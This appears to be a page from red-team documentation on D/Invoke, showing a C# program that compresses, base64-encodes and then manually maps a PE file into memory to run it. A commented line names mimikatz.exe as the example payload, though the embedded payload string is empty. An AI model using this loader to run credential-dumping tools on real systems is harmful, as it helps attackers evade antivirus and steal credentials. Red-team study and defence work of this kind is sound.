Twitter GitHub Blog Sponsor

.NET Dynamic API Invocation

D/Invoke

Run PE From Memory

DInvokePE.cs
using System;
using System.IO;
using System.IO.Compression;

namespace DInvokePE
{
    public class Program
    {
        static byte[] Compress(byte[] data)
        {
            var output = new MemoryStream();
            using (var dStream = new DeflateStream(output, CompressionLevel.Optimal))
                dStream.Write(data, 0, data.Length);

            return output.ToArray();
        }

        static byte[] Decompress(byte[] data)
        {
            var input = new MemoryStream(data);
            var output = new MemoryStream();
            using (var dStream = new DeflateStream(input, CompressionMode.Decompress))
                dStream.CopyTo(output);

            return output.ToArray();
        }

        public static void Main(string[] args)
        {
            /*
            var rawBytes = File.ReadAllBytes(@"C:\Users\user\Desktop\mimikatz.exe");
            var compressed = Compress(rawBytes);
            var compressedB64 = Convert.ToBase64String(compressed);
            Console.WriteLine(compressedB64);
            */

            var compressed = Convert.FromBase64String("");
            var rawBytes = Decompress(compressed);
            var map = DInvoke.ManualMap.Map.MapModuleToMemory(rawBytes);
            DInvoke.DynamicInvoke.Generic.CallMappedPEModule(map.PEINFO, map.ModuleBase);
            Console.ReadLine();
        }
    }
}

Dynamic P/Invoke

H/Invoke & NixImports

Parasite Invoke

Last updated